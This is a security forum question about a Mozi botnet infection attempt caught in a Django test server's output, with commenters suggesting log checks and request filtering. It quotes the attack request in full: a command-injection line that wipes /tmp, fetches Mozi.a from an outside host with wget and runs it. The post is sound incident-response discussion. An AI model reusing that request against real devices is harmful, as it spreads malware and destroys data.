# What should I do after an attempted Mozi attack?

Tags: attacks, webserver, incident-response

I was testing a small webpage using Django's built-in server. The webpage simply shows the IP of the visitor of the webpage, and prints the IP address in the terminal. The server is hosted on a Ubuntu PC at my home IP address, with the domain name pointing to it proxied using Cloudflare.

I was looking at the output when I saw the following:

`[24/Dec/2021 03:14:08] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://[redacted ip]:46873/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 179`

As I understand it, it attempted to clear my `/tmp` folder, download a file from the redacted IP address into `/tmp`, give it executable permissions, and run it.

I'm fairly certain I was not affected by the attack as a) `/shell` was not a configured URL path, b) I checked in my `/tmp` folder, which was not empty, nor did I find a file named `Mozi.a`.

Furthermore, when I accessed the webpage, my IP was printed in the terminal as expected. However, the IP of this request was not printed. The function I am using to find the visitor's IP is below:

```
def get_client_ip(request):
    x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
    if x_forwarded_for:
        ip = x_forwarded_for.split(',')[-1].strip()
    else:
        ip = request.META.get('REMOTE_ADDR')
    return ip
```

Searching for 'Mozi.a', it appears to be a known malware that spreads through P2P networks.

My questions are:

1. How is it possible for the requests' origin IP to be hidden?
2. How can I be completely sure my server is not affected by this attack?

   2.1 As this malware appears to target routers, how can I ensure that my router was not affected by this attack?
3. Is there anything I can do to prevent the server (which could either be the malware's origin, or another infected server) hosting the malicious file from attacking other servers?

Comment: (1) is it, or is it merely absent in the http access log? (2) did any files in `/tmp` predate the timestamp in the access log? (2.1) specs? (3) if the other servers are yours, try a reverse http proxy that supports request filtering, such as [HAProxy](https://www.haproxy.org)/ [Caddy](https://caddyserver.com/docs/quick-starts/reverse-proxy)/ [NGINX](https://docs.nginx.com/nginx/admin-guide/web-server/reverse-proxy/)/ et.al. or any Apache/ equiv (`.htaccess` compatible) http server, to block requests matching the pattern: `net <-> Cloudflare <-> [PROXY <-> your-service]`

Comment: @brynk (1), (2) I was running Django's in-built web server, correct me if I'm mistaken but it doesn't produce any logs by default. (3) This is the only server (I was using for learning/testing purposes after all), but I'll keep your suggestion for reverse http proxy in mind.

Comment: (1) i got as far as finding out [where the value for `REMOTE_ADDR` is set](https://github.com/django/django/blob/main/django/core/handlers/asgi.py#L67) .. but as to *where* the value comes from (??) - if this value is under client control, then this is the likely cause of the opaque msg; so depending on your network topology, services, and configuration of, you may have other source/s for information, eg. firewall/ connection log? some process running that is capturing packets? your router's log? this may let you find the source.  (2) are there any files in `/tmp/` that predate 24dec 03:14:08?